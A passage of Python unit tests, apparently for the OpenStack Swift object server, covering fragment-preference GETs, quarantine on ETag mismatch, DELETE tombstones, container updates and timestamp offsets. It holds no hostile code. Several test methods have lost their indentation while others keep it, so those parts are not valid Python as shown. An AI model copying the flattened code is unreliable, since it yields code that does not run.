                   'X-Backend-Storage-Policy-Index': int(policy)}
        if policy.policy_type == EC_POLICY:
            body = encode_frag_archive_bodies(policy, body)[2]
            headers.update({
                'X-Object-Sysmeta-Ec-Frag-Index': '2',
                'Content-Length': len(body),
            })
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers=headers)
        req.body = body
        # patch the commit method to do nothing so EC object is non-durable
        with mock.patch('swift.obj.diskfile.ECDiskFileWriter.commit'):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        return ts_0, ts_1, ts_2
def test_GET_HEAD_with_fragment_preferences(self):
for policy in POLICIES:
ts_0, ts_1, ts_2 = self._create_ondisk_fragments(policy)
backend_frags = {ts_0.internal: [0], ts_2.internal: [2]}
def _assert_frag_0_at_ts_0(resp):
expect = {
'X-Timestamp': ts_1.normal,
'X-Backend-Timestamp': ts_1.internal,
'X-Backend-Data-Timestamp': ts_0.internal,
'X-Backend-Durable-Timestamp': ts_0.internal,
'X-Object-Sysmeta-Ec-Frag-Index': '0',
'X-Object-Meta-Test': 'abc'}
self.assertDictContainsSubset(expect, resp.headers)
self.assertEqual(backend_frags, json.loads(
resp.headers['X-Backend-Fragments']))
def _assert_repl_data_at_ts_2():
self.assertIn(resp.status_int, (200, 202))
expect = {
'X-Timestamp': ts_2.normal,
'X-Backend-Timestamp': ts_2.internal,
'X-Backend-Data-Timestamp': ts_2.internal,
'X-Backend-Durable-Timestamp': ts_2.internal}
self.assertDictContainsSubset(expect, resp.headers)
self.assertNotIn('X-Object-Meta-Test', resp.headers)
# Sanity check: Request with no preferences should default to the
# durable frag
headers = {'X-Backend-Storage-Policy-Index': int(policy)}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_0_at_ts_0(resp)
self.assertECBodyEqual(resp, 'OLDER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
if policy.policy_type == EC_POLICY:
_assert_frag_0_at_ts_0(resp)
else:
_assert_repl_data_at_ts_2()
# Request with preferences can select the older frag
prefs = json.dumps(
[{'timestamp': ts_0.internal, 'exclude': [1, 3]}])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_0_at_ts_0(resp)
self.assertECBodyEqual(resp, 'OLDER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_0_at_ts_0(resp)
else:
_assert_repl_data_at_ts_2()
def _assert_frag_2_at_ts_2(resp):
self.assertIn(resp.status_int, (200, 202))
# do not expect meta file to be included since it is older
expect = {
'X-Timestamp': ts_2.normal,
'X-Backend-Timestamp': ts_2.internal,
'X-Backend-Data-Timestamp': ts_2.internal,
'X-Backend-Durable-Timestamp': ts_0.internal,
'X-Object-Sysmeta-Ec-Frag-Index': '2'}
self.assertDictContainsSubset(expect, resp.headers)
self.assertEqual(backend_frags, json.loads(
resp.headers['X-Backend-Fragments']))
self.assertNotIn('X-Object-Meta-Test', resp.headers)
# Request with preferences can select the newer non-durable frag
prefs = json.dumps(
[{'timestamp': ts_2.internal, 'exclude': [1, 3]}])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
self.assertECBodyEqual(resp, 'NEWER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
else:
_assert_repl_data_at_ts_2()
# Request with preference for ts_0 but excludes index 0 will
# default to newest frag
prefs = json.dumps(
[{'timestamp': ts_0.internal, 'exclude': [0]}])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
self.assertECBodyEqual(resp, 'NEWER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
else:
_assert_repl_data_at_ts_2()
# Request with preferences that exclude all frags get nothing
prefs = json.dumps(
[{'timestamp': ts_0.internal, 'exclude': [0]},
{'timestamp': ts_2.internal, 'exclude': [2]}])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
self.assertEqual(resp.status_int, 404)
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
self.assertEqual(resp.status_int, 404)
else:
_assert_repl_data_at_ts_2()
# Request with empty preferences will get non-durable
prefs = json.dumps([])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
self.assertECBodyEqual(resp, 'NEWER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
else:
_assert_repl_data_at_ts_2()
    def test_GET_quarantine(self):
        # Test swift.obj.server.ObjectController.GET
        #
        # Write a valid object, then rewrite its on-disk metadata with an
        # ETag that does not match the stored data; fully reading the body
        # must detect the mismatch and quarantine the file, so a second GET
        # returns 404.
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': timestamp,
                                     'Content-Type': 'application/x-test'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
                                             policy=POLICIES.legacy)
        disk_file.open()
        file_name = os.path.basename(disk_file._data_file)
        # ETag of 'VERIF' (5 bytes) deliberately disagrees with the 6-byte
        # 'VERIFY' payload written above.
        etag = md5()
        etag.update('VERIF')
        etag = etag.hexdigest()
        metadata = {'X-Timestamp': timestamp, 'name': '/a/c/o',
                    'Content-Length': 6, 'ETag': etag}
        diskfile.write_metadata(disk_file._fp, metadata)
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        quar_dir = os.path.join(
            self.testdir, 'sda1', 'quarantined', 'objects',
            os.path.basename(os.path.dirname(disk_file._data_file)))
        # File is still in place until the body is actually consumed.
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        body = resp.body  # actually does quarantining
        self.assertEqual(body, 'VERIFY')
        self.assertEqual(os.listdir(quar_dir)[0], file_name)
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
def test_GET_quarantine_zbyte(self):
# Test swift.obj.server.ObjectController.GET
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
policy=POLICIES.legacy)
disk_file.open()
file_name = os.path.basename(disk_file._data_file)
with open(disk_file._data_file) as fp:
metadata = diskfile.read_metadata(fp)
os.unlink(disk_file._data_file)
with open(disk_file._data_file, 'w') as fp:
diskfile.write_metadata(fp, metadata)
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(disk_file._data_file)))
self.assertEqual(os.listdir(quar_dir)[0], file_name)
    def test_GET_quarantine_range(self):
        # Test swift.obj.server.ObjectController.GET
        #
        # After corrupting the stored metadata (ETag of 'VERIF' vs body
        # 'VERIFY'), ranged GETs that read only part of the object must NOT
        # quarantine it; a range covering the whole body must.
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': timestamp,
                                     'Content-Type': 'application/x-test'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
                                             policy=POLICIES.legacy)
        disk_file.open()
        file_name = os.path.basename(disk_file._data_file)
        etag = md5()
        etag.update('VERIF')
        etag = etag.hexdigest()
        metadata = {'X-Timestamp': timestamp, 'name': '/a/c/o',
                    'Content-Length': 6, 'ETag': etag}
        diskfile.write_metadata(disk_file._fp, metadata)
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        req = Request.blank('/sda1/p/a/c/o')
        req.range = 'bytes=0-4'  # partial
        resp = req.get_response(self.object_controller)
        quar_dir = os.path.join(
            self.testdir, 'sda1', 'quarantined', 'objects',
            os.path.basename(os.path.dirname(disk_file._data_file)))
        resp.body  # consume the (partial) body; must not quarantine
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        self.assertFalse(os.path.isdir(quar_dir))
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        req = Request.blank('/sda1/p/a/c/o')
        req.range = 'bytes=1-6'  # partial
        resp = req.get_response(self.object_controller)
        quar_dir = os.path.join(
            self.testdir, 'sda1', 'quarantined', 'objects',
            os.path.basename(os.path.dirname(disk_file._data_file)))
        resp.body  # still only a partial read -> still no quarantine
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        self.assertFalse(os.path.isdir(quar_dir))
        req = Request.blank('/sda1/p/a/c/o')
        req.range = 'bytes=0-14'  # full
        resp = req.get_response(self.object_controller)
        quar_dir = os.path.join(
            self.testdir, 'sda1', 'quarantined', 'objects',
            os.path.basename(os.path.dirname(disk_file._data_file)))
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        resp.body  # whole body read -> checksum mismatch -> quarantine
        self.assertTrue(os.path.isdir(quar_dir))
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
    @mock.patch("time.time", mock_time)
    def test_DELETE(self):
        # Test swift.obj.server.ObjectController.DELETE
        # DELETE of a container path (no object component) is a bad request.
        req = Request.blank('/sda1/p/a/c',
                            environ={'REQUEST_METHOD': 'DELETE'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 400)
        # DELETE without an X-Timestamp header is also a bad request.
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'DELETE'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 400)
        # The following should have created a tombstone file
        timestamp = normalize_timestamp(1000)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'DELETE'},
                            headers={'X-Timestamp': timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        ts_1000_file = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.ts')
        self.assertTrue(os.path.isfile(ts_1000_file))
        # There should now be a 1000 ts file.
        self.assertEqual(len(os.listdir(os.path.dirname(ts_1000_file))), 1)
        # The following should *not* have created a tombstone file because
        # it is older than the existing 1000 tombstone.
        timestamp = normalize_timestamp(999)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'DELETE'},
                            headers={'X-Timestamp': timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        ts_999_file = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.ts')
        self.assertFalse(os.path.isfile(ts_999_file))
        self.assertTrue(os.path.isfile(ts_1000_file))
        self.assertEqual(len(os.listdir(os.path.dirname(ts_1000_file))), 1)
        orig_timestamp = utils.Timestamp(1002).internal
        headers = {'X-Timestamp': orig_timestamp,
                   'Content-Type': 'application/octet-stream',
                   'Content-Length': '4'}
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers=headers)
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # There should now be only a 1002 data file; the PUT superseded the
        # 1000 tombstone.
        data_1002_file = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            orig_timestamp + '.data')
        self.assertTrue(os.path.isfile(data_1002_file))
        self.assertEqual(len(os.listdir(os.path.dirname(data_1002_file))), 1)
        # The following DELETE is older than the 1002 data file, so it must
        # be rejected with 409 and *not* create a tombstone file.
        timestamp = normalize_timestamp(1001)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'DELETE'},
                            headers={'X-Timestamp': timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
        ts_1001_file = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.ts')
        self.assertFalse(os.path.isfile(ts_1001_file))
        self.assertTrue(os.path.isfile(data_1002_file))
        self.assertEqual(len(os.listdir(os.path.dirname(ts_1001_file))), 1)
        # A DELETE newer than the data file succeeds (204) and leaves only
        # its tombstone behind.
        timestamp = normalize_timestamp(1003)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'DELETE'},
                            headers={'X-Timestamp': timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 204)
        ts_1003_file = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.ts')
        self.assertTrue(os.path.isfile(ts_1003_file))
        self.assertEqual(len(os.listdir(os.path.dirname(ts_1003_file))), 1)
def test_DELETE_bad_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': 'bad'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
    def test_DELETE_succeeds_with_later_POST(self):
        # A DELETE that is newer than the data file but older than a
        # subsequent POST still succeeds (204); afterwards its tombstone
        # and the newer .meta file coexist in the object directory.
        t_put = next(self.ts).internal
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': t_put,
                                     'Content-Length': 0,
                                     'Content-Type': 'plain/text'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Note: t_delete is drawn *before* t_post, so the DELETE carries an
        # older timestamp than the POST even though it is issued afterwards.
        t_delete = next(self.ts).internal
        t_post = next(self.ts).internal
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': t_post})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'DELETE'},
                            headers={'X-Timestamp': t_delete},
                            )
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 204)
        obj_dir = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(0), 'p',
                              hash_path('a', 'c', 'o')))
        # Both the tombstone and the (newer) POST metadata survive.
        ts_file = os.path.join(obj_dir, t_delete + '.ts')
        self.assertTrue(os.path.isfile(ts_file))
        meta_file = os.path.join(obj_dir, t_post + '.meta')
        self.assertTrue(os.path.isfile(meta_file))
    def test_DELETE_container_updates(self):
        # Test swift.obj.server.ObjectController.DELETE and container
        # updates, making sure container update is called in the correct
        # state.
        start = time()
        orig_timestamp = utils.Timestamp(start)
        headers = {'X-Timestamp': orig_timestamp.internal,
                   'Content-Type': 'application/octet-stream',
                   'Content-Length': '4'}
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers=headers)
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)

        calls_made = [0]

        # Count container_update invocations instead of performing real
        # updates; the real method is restored in the finally clause.
        def our_container_update(*args, **kwargs):
            calls_made[0] += 1

        orig_cu = self.object_controller.container_update
        self.object_controller.container_update = our_container_update
        try:
            # The following request should return 409 (HTTP Conflict). A
            # tombstone file should not have been created with this timestamp.
            timestamp = utils.Timestamp(start - 0.00001)
            req = Request.blank('/sda1/p/a/c/o',
                                environ={'REQUEST_METHOD': 'DELETE'},
                                headers={'X-Timestamp': timestamp.internal})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 409)
            self.assertEqual(resp.headers['x-backend-timestamp'],
                             orig_timestamp.internal)
            objfile = os.path.join(
                self.testdir, 'sda1',
                storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                                  hash_path('a', 'c', 'o')),
                utils.Timestamp(timestamp).internal + '.ts')
            self.assertFalse(os.path.isfile(objfile))
            self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)
            self.assertEqual(0, calls_made[0])

            # The following request should return 204, and the object should
            # be truly deleted (container update is performed) because this
            # timestamp is newer. A tombstone file should have been created
            # with this timestamp.
            timestamp = utils.Timestamp(start + 0.00001)
            req = Request.blank('/sda1/p/a/c/o',
                                environ={'REQUEST_METHOD': 'DELETE'},
                                headers={'X-Timestamp': timestamp.internal})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 204)
            objfile = os.path.join(
                self.testdir, 'sda1',
                storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                                  hash_path('a', 'c', 'o')),
                utils.Timestamp(timestamp).internal + '.ts')
            self.assertTrue(os.path.isfile(objfile))
            self.assertEqual(1, calls_made[0])
            self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)

            # The following request should return a 404, as the object should
            # already have been deleted, but it should have also performed a
            # container update because the timestamp is newer, and a tombstone
            # file should also exist with this timestamp.
            timestamp = utils.Timestamp(start + 0.00002)
            req = Request.blank('/sda1/p/a/c/o',
                                environ={'REQUEST_METHOD': 'DELETE'},
                                headers={'X-Timestamp': timestamp.internal})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
            objfile = os.path.join(
                self.testdir, 'sda1',
                storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                                  hash_path('a', 'c', 'o')),
                utils.Timestamp(timestamp).internal + '.ts')
            self.assertTrue(os.path.isfile(objfile))
            self.assertEqual(2, calls_made[0])
            self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)

            # The following request should return a 404, as the object should
            # already have been deleted, and it should not have performed a
            # container update because the timestamp is older, or created a
            # tombstone file with this timestamp.
            timestamp = utils.Timestamp(start + 0.00001)
            req = Request.blank('/sda1/p/a/c/o',
                                environ={'REQUEST_METHOD': 'DELETE'},
                                headers={'X-Timestamp': timestamp.internal})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
            objfile = os.path.join(
                self.testdir, 'sda1',
                storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                                  hash_path('a', 'c', 'o')),
                utils.Timestamp(timestamp).internal + '.ts')
            self.assertFalse(os.path.isfile(objfile))
            self.assertEqual(2, calls_made[0])
            self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)
        finally:
            self.object_controller.container_update = orig_cu
def test_DELETE_full_drive(self):
def mock_diskfile_delete(self, timestamp):
raise DiskFileNoSpace()
t_put = utils.Timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': t_put.internal,
'Content-Length': 0,
'Content-Type': 'plain/text'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
with mock.patch('swift.obj.diskfile.BaseDiskFile.delete',
mock_diskfile_delete):
t_delete = utils.Timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': t_delete.internal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 507)
    def test_object_update_with_offset(self):
        # Requests carrying the same wall-clock timestamp but a larger
        # internal offset (Timestamp(..., offset=N)) must supersede earlier
        # operations, and each accepted PUT/DELETE must trigger exactly one
        # container update carrying that (offset) timestamp.
        container_updates = []

        def capture_updates(ip, port, method, path, headers, *args, **kwargs):
            container_updates.append((ip, port, method, path, headers))
        # create a new object
        create_timestamp = next(self.ts).internal
        req = Request.blank('/sda1/p/a/c/o', method='PUT', body='test1',
                            headers={'X-Timestamp': create_timestamp,
                                     'X-Container-Host': '10.0.0.1:8080',
                                     'X-Container-Device': 'sda1',
                                     'X-Container-Partition': 'p',
                                     'Content-Type': 'text/plain'})
        with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertRaises(StopIteration, fake_conn.code_iter.next)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(1, len(container_updates))
        for update in container_updates:
            ip, port, method, path, headers = update
            self.assertEqual(ip, '10.0.0.1')
            self.assertEqual(port, '8080')
            self.assertEqual(method, 'PUT')
            self.assertEqual(path, '/sda1/p/a/c/o')
            expected = {
                'X-Size': len('test1'),
                'X-Etag': md5('test1').hexdigest(),
                'X-Content-Type': 'text/plain',
                'X-Timestamp': create_timestamp,
            }
            for key, value in expected.items():
                self.assertEqual(headers[key], str(value))
        container_updates = []  # reset
        # read back object
        req = Request.blank('/sda1/p/a/c/o', method='GET')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.headers['X-Timestamp'],
                         utils.Timestamp(create_timestamp).normal)
        self.assertEqual(resp.headers['X-Backend-Timestamp'],
                         create_timestamp)
        self.assertEqual(resp.body, 'test1')
        # send an update with an offset
        offset_timestamp = utils.Timestamp(
            create_timestamp, offset=1).internal
        req = Request.blank('/sda1/p/a/c/o', method='PUT', body='test2',
                            headers={'X-Timestamp': offset_timestamp,
                                     'X-Container-Host': '10.0.0.1:8080',
                                     'X-Container-Device': 'sda1',
                                     'X-Container-Partition': 'p',
                                     'Content-Type': 'text/html'})
        with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertRaises(StopIteration, fake_conn.code_iter.next)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(1, len(container_updates))
        for update in container_updates:
            ip, port, method, path, headers = update
            self.assertEqual(ip, '10.0.0.1')
            self.assertEqual(port, '8080')
            self.assertEqual(method, 'PUT')
            self.assertEqual(path, '/sda1/p/a/c/o')
            expected = {
                'X-Size': len('test2'),
                'X-Etag': md5('test2').hexdigest(),
                'X-Content-Type': 'text/html',
                'X-Timestamp': offset_timestamp,
            }
            for key, value in expected.items():
                self.assertEqual(headers[key], str(value))
        container_updates = []  # reset
        # read back new offset
        req = Request.blank('/sda1/p/a/c/o', method='GET')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.headers['X-Timestamp'],
                         utils.Timestamp(offset_timestamp).normal)
        self.assertEqual(resp.headers['X-Backend-Timestamp'],
                         offset_timestamp)
        self.assertEqual(resp.body, 'test2')
        # now overwrite with a newer time
        overwrite_timestamp = next(self.ts).internal
        req = Request.blank('/sda1/p/a/c/o', method='PUT', body='test3',
                            headers={'X-Timestamp': overwrite_timestamp,
                                     'X-Container-Host': '10.0.0.1:8080',
                                     'X-Container-Device': 'sda1',
                                     'X-Container-Partition': 'p',
                                     'Content-Type': 'text/enriched'})
        with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertRaises(StopIteration, fake_conn.code_iter.next)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(1, len(container_updates))
        for update in container_updates:
            ip, port, method, path, headers = update
            self.assertEqual(ip, '10.0.0.1')
            self.assertEqual(port, '8080')
            self.assertEqual(method, 'PUT')
            self.assertEqual(path, '/sda1/p/a/c/o')
            expected = {
                'X-Size': len('test3'),
                'X-Etag': md5('test3').hexdigest(),
                'X-Content-Type': 'text/enriched',
                'X-Timestamp': overwrite_timestamp,
            }
            for key, value in expected.items():
                self.assertEqual(headers[key], str(value))
        container_updates = []  # reset
        # read back overwrite
        req = Request.blank('/sda1/p/a/c/o', method='GET')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.headers['X-Timestamp'],
                         utils.Timestamp(overwrite_timestamp).normal)
        self.assertEqual(resp.headers['X-Backend-Timestamp'],
                         overwrite_timestamp)
        self.assertEqual(resp.body, 'test3')
        # delete with an offset
        offset_delete = utils.Timestamp(overwrite_timestamp,
                                        offset=1).internal
        req = Request.blank('/sda1/p/a/c/o', method='DELETE',
                            headers={'X-Timestamp': offset_delete,
                                     'X-Container-Host': '10.0.0.1:8080',
                                     'X-Container-Device': 'sda1',
                                     'X-Container-Partition': 'p'})
        with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertRaises(StopIteration, fake_conn.code_iter.next)
        self.assertEqual(resp.status_int, 204)
        self.assertEqual(1, len(container_updates))
        for update in container_updates:
            ip, port, method, path, headers = update
            self.assertEqual(ip, '10.0.0.1')
            self.assertEqual(port, '8080')
            self.assertEqual(method, 'DELETE')
            self.assertEqual(path, '/sda1/p/a/c/o')
            expected = {
                'X-Timestamp': offset_delete,
            }
            for key, value in expected.items():
                self.assertEqual(headers[key], str(value))
        container_updates = []  # reset
        # read back offset delete
        req = Request.blank('/sda1/p/a/c/o', method='GET')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        self.assertEqual(resp.headers['X-Timestamp'], None)
        self.assertEqual(resp.headers['X-Backend-Timestamp'], offset_delete)
        # and one more delete with a newer timestamp
        delete_timestamp = next(self.ts).internal
        req = Request.blank('/sda1/p/a/c/o', method='DELETE',
                            headers={'X-Timestamp': delete_timestamp,
                                     'X-Container-Host': '10.0.0.1:8080',
                                     'X-Container-Device': 'sda1',
                                     'X-Container-Partition': 'p'})
        with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertRaises(StopIteration, fake_conn.code_iter.next)
        # already deleted, so 404, but the newer tombstone still triggers a
        # container update
        self.assertEqual(resp.status_int, 404)
        self.assertEqual(1, len(container_updates))
        for update in container_updates:
            ip, port, method, path, headers = update
            self.assertEqual(ip, '10.0.0.1')
            self.assertEqual(port, '8080')
            self.assertEqual(method, 'DELETE')
            self.assertEqual(path, '/sda1/p/a/c/o')
            expected = {
                'X-Timestamp': delete_timestamp,
            }
            for key, value in expected.items():
                self.assertEqual(headers[key], str(value))
        container_updates = []  # reset
        # read back delete
        req = Request.blank('/sda1/p/a/c/o', method='GET')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        self.assertEqual(resp.headers['X-Timestamp'], None)
        self.assertEqual(resp.headers['X-Backend-Timestamp'], delete_timestamp)
def test_call_bad_request(self):
# Test swift.obj.server.ObjectController.__call__
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': 'PUT',
